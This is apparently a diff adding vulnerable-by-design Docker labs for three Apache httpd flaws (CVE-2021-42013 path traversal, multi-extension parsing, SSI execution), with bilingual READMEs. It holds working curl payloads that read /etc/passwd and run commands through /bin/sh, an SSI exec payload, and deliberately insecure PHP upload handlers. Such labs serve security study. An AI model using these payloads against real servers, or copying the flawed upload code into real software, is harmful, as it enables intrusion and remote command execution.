+    && mv /tmp/httpd.conf /usr/local/apache2/conf/httpd.conf

httpd/CVE-2021-42013/README.md

@@ -0,0 +1,47 @@
+# Path traversal and file disclosure vulnerability in Apache HTTP Server 2.4.50 (CVE-2021-42013)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+The Apache HTTP Server Project is an effort to develop and maintain an open-source HTTP server for modern operating systems including UNIX and Windows.
+
+CVE-2021-42013 is a vulnerability that caused by incomplete fix of [CVE-2021-41773](https://github.com/vulhub/vulhub/tree/master/httpd/CVE-2021-41773), an attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives.
+
+This vulnerability affects Apache HTTP Server 2.4.49 and 2.4.50 and not earlier versions.
+
+References:
+
+- https://httpd.apache.org/security/vulnerabilities_24.html
+- https://twitter.com/roman_soft/status/1446252280597078024
+
+## Vulnerable environment
+
+Execute following commands to start a vulnerable Apache HTTP Server:
+
+```
+docker compose build
+docker compose up -d
+```
+
+After the server is started, you can see the default page which says `It works!` of Apache HTTP Server through `http://your-ip:8080`.
+
+## Exploit
+
+Apache HTTP Server 2.4.50 patched the previous CVE-2021-41773 payload such as `http://your:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd`, but it was incomplete.
+
+Use `.%%32%65` to bypass the patches (Note that `/icons/` must be a existing directory):
+
+```
+curl -v --path-as-is http://your-ip:8080/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd
+```
+
+The `/etc/passwd` is disclosured successfully:
+
+![](1.png)
+
+With the mods cgi or cgid enabled on the server, this path traversal vulnerability would allow arbitrary command execution:
+
+```
+curl -v --data "echo;id" 'http://your-ip:8080/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh'
+```
+
+![](2.png)

httpd/CVE-2021-42013/README.zh-cn.md

@@ -0,0 +1,45 @@
+# Apache HTTP Server 2.4.50 路径穿越漏洞（CVE-2021-42013）
+
+Apache HTTP Server是Apache基金会开源的一款流行的HTTP服务器。Apache官方在2.4.50版本中对2.4.49版本中出现的目录穿越漏洞[CVE-2021-41773](https://github.com/vulhub/vulhub/tree/master/httpd/CVE-2021-41773)进行了修复，但这个修复是不完整的，CVE-2021-42013是对补丁的绕过。
+
+攻击者利用这个漏洞，可以读取位于Apache服务器Web目录以外的其他文件，或者读取Web目录中的脚本文件源码，或者在开启了cgi或cgid的服务器上执行任意命令。
+
+这个漏洞可以影响Apache HTTP Server 2.4.49以及2.4.50两个版本。
+
+参考链接：
+
+- https://httpd.apache.org/security/vulnerabilities_24.html
+- https://twitter.com/roman_soft/status/1446252280597078024
+
+## 漏洞环境
+
+执行如下命令编译及运行一个存在漏洞的Apache HTTP Server 2.4.50版本服务器：
+
+```
+docker compose build
+docker compose up -d
+```
+
+环境启动后，访问`http://your-ip:8080`即可看到Apache默认的`It works!`页面。
+
+## 漏洞利用
+
+我们使用[CVE-2021-41773](https://github.com/vulhub/vulhub/tree/master/httpd/CVE-2021-41773)中的Payload已经无法成功利用漏洞了，说明2.4.50进行了修复。
+
+但我们可以使用`.%%32%65`进行绕过（注意其中的`/icons/`必须是一个存在且可访问的目录）：
+
+```
+curl -v --path-as-is http://your-ip:8080/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd
+```
+
+可见，成功读取到`/etc/passwd`：
+
+![](1.png)
+
+在服务端开启了cgi或cgid这两个mod的情况下，这个路径穿越漏洞将可以执行任意命令：
+
+```
+curl -v --data "echo;id" 'http://your-ip:8080/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh'
+```
+
+![](2.png)

httpd/CVE-2021-42013/docker-compose.yml

@@ -0,0 +1,6 @@
+version: '2'
+services:
+ apache:
+   build: .
+   ports:
+    - "8080:80"

httpd/apache_parsing_vulnerability/README.md

@@ -0,0 +1,40 @@
+# Apache HTTPD Multiple Extension Parsing Vulnerability
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Apache HTTPD is a widely-used HTTP server that can run PHP web pages through mod_php. This vulnerability is related to how Apache HTTPD handles files with multiple extensions.
+
+Apache HTTPD supports files having multiple extensions, with different directives being executed for each extension. When misconfigured, this feature can lead to security vulnerabilities where malicious files bypass upload restrictions. For example, with the following configuration:
+
+```
+AddType text/html .html
+AddLanguage zh-CN .cn
+AddHandler application/x-httpd-php .php
+```
+
+The server will process multiple extensions from left to right, and if any extension is configured to be handled by a specific handler (like PHP), it will be executed regardless of its position in the filename. This means a file named `malicious.php.jpg` would still be executed as PHP code, potentially bypassing upload restrictions that only check the final extension.
+
+References:
+
+- [Apache HTTP Server Documentation - MultiViews](https://httpd.apache.org/docs/current/content-negotiation.html#multiviews)
+- [OWASP File Upload Vulnerabilities](https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload)
+
+## Environment Setup
+
+Execute the following command to start an Apache server with PHP 7.3 environment:
+
+```
+docker compose up -d
+```
+
+## Vulnerability Reproduction
+
+First, visit `http://your-ip/uploadfiles/apache.php.jpeg` in your browser. You'll notice that despite having a `.jpeg` extension, the file is executed as PHP code and displays the phpinfo() page.
+
+To actively exploit this vulnerability, visit `http://your-ip/index.php` where you'll find a file upload interface with extension whitelist validation. The upload functionality only checks the final extension but doesn't rename the uploaded file. By uploading a file with multiple extensions like `shell.php.jpg` or `shell.php.jpeg`, we can bypass the extension check while ensuring the file is still executed as PHP code by Apache.
+
+![Upload Interface](1.png)
+
+After successful upload, accessing the file through the browser will execute the PHP code, demonstrating the vulnerability:
+
+![Vulnerability Proof](2.png)

httpd/apache_parsing_vulnerability/README.zh-cn.md

@@ -0,0 +1,40 @@
+# Apache HTTPD 多后缀解析漏洞
+
+[English](README.md)
+
+Apache HTTPD 是一个广泛使用的开源Web服务器软件。这个漏洞与Apache HTTPD处理多后缀文件的机制有关。
+
+Apache HTTPD支持一个文件拥有多个后缀，并为不同后缀执行不同的指令。当配置不当时，这个特性可能导致安全漏洞，使恶意文件绕过上传限制。例如，以下配置：
+
+```
+AddType text/html .html
+AddLanguage zh-CN .cn
+AddHandler application/x-httpd-php .php
+```
+
+服务器会从左到右处理多个后缀，如果任何后缀被配置为由特定处理器（如PHP）处理，那么无论该后缀在文件名中的位置如何，都会被执行。这意味着一个名为`malicious.php.jpg`的文件仍然会被作为PHP代码执行，从而可能绕过仅检查最后一个后缀的上传限制。
+
+参考链接：
+
+- [Apache HTTP Server文档 - MultiViews](https://httpd.apache.org/docs/current/content-negotiation.html#multiviews)
+- [OWASP文件上传漏洞](https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload)
+
+## 环境搭建
+
+执行以下命令启动一个包含PHP 7.3环境的Apache服务器：
+
+```
+docker compose up -d
+```
+
+## 漏洞复现
+
+首先，在浏览器中访问`http://your-ip/uploadfiles/apache.php.jpeg`。你会发现，尽管文件具有`.jpeg`后缀，但它被作为PHP代码执行并显示了phpinfo()页面。
+
+要主动利用这个漏洞，访问`http://your-ip/index.php`，你会看到一个带有后缀白名单验证的文件上传界面。上传功能只检查最后一个后缀，且不会重命名上传的文件。通过上传具有多个后缀的文件（如`shell.php.jpg`或`shell.php.jpeg`），我们可以绕过后缀检查，同时确保文件被Apache作为PHP代码执行。
+
+![上传界面](1.png)
+
+成功上传后，通过浏览器访问该文件将执行PHP代码，证实了漏洞的存在：
+
+![漏洞证明](2.png)

httpd/apache_parsing_vulnerability/conf/docker-php.conf

@@ -0,0 +1,9 @@
+AddHandler application/x-httpd-php .php
+
+DirectoryIndex disabled
+DirectoryIndex index.php index.html                                                                  
+
+<Directory /var/www/>
+    Options -Indexes
+    AllowOverride All
+</Directory>

httpd/apache_parsing_vulnerability/docker-compose.yml

@@ -0,0 +1,10 @@
+services:
+ apache:
+   image: php:7.3-apache
+   volumes:
+    - ./www:/var/www/html
+    - ./conf/docker-php.conf:/etc/apache2/conf-enabled/docker-php.conf
+    - ./start.sh:/var/www/start.sh
+   command: /bin/sh /var/www/start.sh
+   ports:
+    - "80:80"

httpd/apache_parsing_vulnerability/start.sh

@@ -0,0 +1,6 @@
+#!/bin/sh
+
+PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/bin
+
+chmod 777 /var/www/html/uploadfiles
+apache2-foreground

httpd/apache_parsing_vulnerability/www/index.php

@@ -0,0 +1,24 @@
+<?php
+
+if (!empty($_FILES)):
+
+$ext = pathinfo($_FILES['file_upload']['name'], PATHINFO_EXTENSION);
+if (!in_array($ext, ['gif', 'png', 'jpg', 'jpeg'])) {
+    die('Unsupported filetype uploaded.');
+}
+
+$new_name = __DIR__ . '/uploadfiles/' . $_FILES['file_upload']['name'];
+if(!move_uploaded_file($_FILES['file_upload']['tmp_name'], $new_name)){
+    die('Error uploading file - check destination is writeable.');
+}
+
+die('File uploaded successfully: ' . $new_name);
+
+else:
+?>
+<form method="post" enctype="multipart/form-data">
+    File: <input type="file" name="file_upload">
+    <input type="submit">
+</form>
+<?php
+endif;

httpd/apache_parsing_vulnerability/www/uploadfiles/apache.php.jpeg

@@ -0,0 +1,2 @@
+<?php
+phpinfo();

httpd/ssi-rce/Dockerfile

@@ -0,0 +1,8 @@
+FROM php:7.1-apache
+
+LABEL maintainer="phithon <root@leavesongs.com>"
+
+RUN set -ex \
+    && a2enmod include cgid \
+    && sed -i 's/Options -Indexes/Options -Indexes +Includes/' /etc/apache2/conf-enabled/docker-php.conf
+ 

httpd/ssi-rce/README.md

@@ -0,0 +1,36 @@
+# Apache HTTP Server SSI Remote Command Execution
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Apache HTTP Server with Server Side Includes (SSI) enabled allows server-side execution of commands through special SSI directives in HTML files. When misconfigured, this feature can be exploited through file upload vulnerabilities.
+
+When testing arbitrary file upload vulnerabilities, the target server might block files with PHP extensions. However, if the server has SSI and CGI support enabled, attackers can upload an SHTML file and execute arbitrary commands using the `<!--#exec cmd="command" -->` syntax.
+
+References:
+
+- [Apache SSI Documentation](https://httpd.apache.org/docs/2.4/howto/ssi.html)
+- [W3 SSI Directives](https://www.w3.org/Jigsaw/Doc/User/SSI.html)
+
+## Environment Setup
+
+Execute the following command to start an Apache HTTP Server with SSI and CGI support:
+
+```
+docker compose up -d
+```
+
+After the server is started, visit `http://your-ip:8080/upload.php` to access the upload form.
+
+## Vulnerability Reproduction
+
+While uploading PHP files is not allowed, we can upload a file named `shell.shtml` with the following content:
+
+```shtml
+<!--#exec cmd="ls" -->
+```
+
+![Upload Interface](1.png)
+
+After successful upload, visiting the shell.shtml file will execute the command, demonstrating the vulnerability:
+
+![Command Execution Result](2.png)

httpd/ssi-rce/README.zh-cn.md

@@ -0,0 +1,34 @@
+# Apache HTTP Server SSI 远程命令执行漏洞
+
+Apache HTTP Server 开启了服务器端包含（SSI）功能时，允许通过特殊的SSI指令在HTML文件中执行服务器端命令。当配置不当时，这个功能可能被通过文件上传漏洞利用。
+
+在测试任意文件上传漏洞时，目标服务器可能会禁止上传PHP后缀的文件。但是，如果服务器开启了SSI和CGI支持，攻击者可以上传一个SHTML文件，并使用 `<!--#exec cmd="命令" -->` 语法执行任意命令。
+
+参考链接：
+
+- [Apache SSI 文档](https://httpd.apache.org/docs/2.4/howto/ssi.html)
+- [W3 SSI 指令](https://www.w3.org/Jigsaw/Doc/User/SSI.html)
+
+## 环境搭建
+
+执行以下命令启动一个支持SSI和CGI的Apache服务器：
+
+```
+docker compose up -d
+```
+
+环境启动后，访问 `http://your-ip:8080/upload.php` 即可看到上传表单界面。
+
+## 漏洞复现
+
+虽然上传PHP文件是被禁止的，但我们可以上传一个名为 `shell.shtml` 的文件，内容如下：
+
+```shtml
+<!--#exec cmd="ls" -->
+```
+
+![上传界面](1.png)
+
+成功上传后，访问shell.shtml文件，可以看到命令已被执行，证实了漏洞的存在：
+
+![命令执行结果](2.png)

httpd/ssi-rce/docker-compose.yml

@@ -0,0 +1,8 @@
+version: '2'
+services:
+ apache:
+   build: .
+   ports:
+    - "8080:80"
+   volumes:
+    - ./upload.php:/var/www/html/upload.php

httpd/ssi-rce/upload.php

@@ -0,0 +1,16 @@
+<?php
+if (!empty($_FILES)):
+$ext = pathinfo($_FILES['file_upload']['name'], PATHINFO_EXTENSION);
+if (in_array($ext, ['php'])) {
+    die('Unsupported filetype uploaded.');
+}
+
+move_uploaded_file($_FILES['file_upload']['tmp_name'], './' . $_FILES['file_upload']['name']);
+echo "<a href='/{$_FILES['file_upload']['name']}'>{$_FILES['file_upload']['name']}</a>";
+
+endif;
+?>
+<form method="post" enctype="multipart/form-data">
+    File: <input type="file" name="file_upload">
+    <input type="submit">
+</form>